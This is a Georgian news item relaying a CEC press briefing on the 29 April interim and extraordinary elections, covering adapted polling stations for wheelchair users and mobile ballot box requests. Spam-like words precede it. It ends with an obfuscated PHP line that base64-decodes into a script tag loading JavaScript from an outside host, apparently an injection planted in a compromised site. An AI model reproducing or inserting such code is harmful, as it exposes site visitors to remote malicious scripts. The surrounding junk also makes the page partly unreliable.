celsiusi
ავერსი შნაიდერი

 29 აპრილის შუალედურ/რიგგარეშე არჩევნებამდე ზუსტად ორი კვირა რჩება და საარჩევნო ადმინისტრაცია აგრძელებს აქტიურ მუშაობას იმისათვის, რომ არჩევნები მაღალ დონეზე, საერთაშორისო სტანდარტების შესაბამისად ჩატარდეს.

როგორც დღეს გამართულ ბრიფინგზე ცესკო-ს პრეს-სპიკერმა, ნათია იოსელიანმა განაცხადა, 29 აპრილის არჩევნები განსაკუთრებული მნიშვნელობისაა, რადგან წელს ელექტრონული ტექნოლოგიები ფართო მასშტაბით პირველად იქნება გამოყენებული და საარჩევნო ადმინისტრაცია მოუწოდებს ამომრჩევლებს აქტიურად ჩაერთონ პროცესში.

„საარჩევნო ადმინისტრაცია არსებული პრაქტიკის შესაბამისად ამომრჩეველს ამ არჩევნებისთვისაც არაერთ სერვისს სთავაზობს. დღეს მინდა, შეგახსენოთ ინფორმაცია იმ სერვისებისა და ვადების შესახებ, რომელიც გადასატანი ყუთისა და ადაპტირებული საარჩევნო უბნის მოთხოვნას უკავშირდება.

29 აპრილის არჩევნებში მონაწილეობის მისაღებად, ეტლით მოსარგებლე ამომრჩევლებს, რომლებიც მონაწილეობას იღებენ შუალედურ არჩევნებში, შეუძლიათ, მოითხოვონ შესაბამისი მაჟორიტარული საარჩევნო ოლქის ტერიტორიაზე არსებული ნებისმიერი ადაპტირებულ/მისაწვდომი საარჩევნო უბანი. ამისათვის მათ არაუგვიანეს 21 აპრილის 18:00 საათამდე, უნდა მიმართონ შესაბამის საოლქო ან საუბნო საარჩევნო კომისიას, ან დაუკავშირდნენ ცესკო-ს კონტაქტ-ჰაბს ტელეფონის ნომერზე – 2 51 00 51 და მოითხოვონ მათთვის სასურველი ადაპტირებული საარჩევნო უბანი. იგივე პროცედურა, იგივე ვადებში უნდა გაიაროს იმ ეტლით მოსარგებლე ამომრჩევლებმა, რომლებიც მონაწილეობას იღებენ რიგგარეშე არჩევნებში. მათ შესაძლებლობა აქვთ არჩევნებში მონაწილეობის მისაღებად მოითხოვონ შესაბამისი საოლქო საარჩევნო კომისიის ტერიტორიაზე არსებული ნებისმიერი ადაპტირებული/მისაწვდომი საარჩევნო უბანი.

აღსანიშნავია, რომ ეტლით მოსარგებლე ამომრჩეველს ცესკო-ს ვებგვერდზე განთავსებულ „საარჩევნო რუკაზე“ შეუძლია ნახოს დეტალური ინფორმაცია და ფოტოები კონკრეტული საარჩევნო ოლქის სამოქმედო ტერიტორიაზე არსებული ადაპტირებული/მისაწვდომი საარჩევნო უბნების შესახებ. ცესკო-ს ვებგვერდზე ხელმისაწვდომია ინფორმაცია როგორც მარტივი ადაპტაციის, ისე პანდუსის მქონე 69 საარჩევნო უბნის შესახებ, რომელიც 29 აპრილის არჩევნებისთვის იფუნქციონირებს.

მივმართავთ ეტლით მოსარგებლე ამომრჩევლებს, სურვილის და საჭიროების შემთხვევაში, შეარჩიონ მათთვის ყველაზე ხელსაყრელი ადაპტირებული საარჩევნო უბანი და ინფორმაცია დროულად მიაწოდონ შესაბამის საარჩევნო კომისიას.

რაც შეეხება გადასატანი საარჩევნო ყუთის მოთხოვნას. ამომრჩეველს, რომელსაც ჯანმრთელობის მდგომარეობის გამო არ შეუძლია კენჭისყრის შენობაში მისვლადა იმყოფება ამავე საარჩევნო უბნის ტერიტორიაზე, შესაძლებლობა აქვს მოითხოვოს გადასატანი საარჩევნო ყუთი. ამისათვის მან უნდა მიმართოს შესაბამის საუბნო საარჩევნო კომისიას21 აპრილის 18:00 საათამდე. აღსანიშნავია, რომ ამ არჩევნებზე პირველად მოხდება იმ ამომრჩევლების მარკირება, რომლებიც ხმას მისცემენ გადასატანი საარჩევნო ყუთის მეშვეობით“, – განაცხადა ნათია იოსელიანმა.

შეგახსენებთ, 29 აპრილს საქართველოს პარლამენტისა და მუნიციპალიტეტის საკრებულოების შუალედური, ასევე მერების რიგგარეშე არჩევნები გაიმართება. ამომრჩევლები აირჩევენ: საქართველოს პარლამენტის ფოთი-სენაკი-ხობის მაჟორიტარ დეპუტატს, გურჯაანის, თიანეთის, ახალციხის, ტყიბულის, ქუთაისის საკრებულოების მაჟორიტარ დეპუტატებს, ასევე ცაგერისა და თერჯოლის მერებს.

ინფორმაციას ცესკო-ს პრესსამსახური ავრცელებს. 

271
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");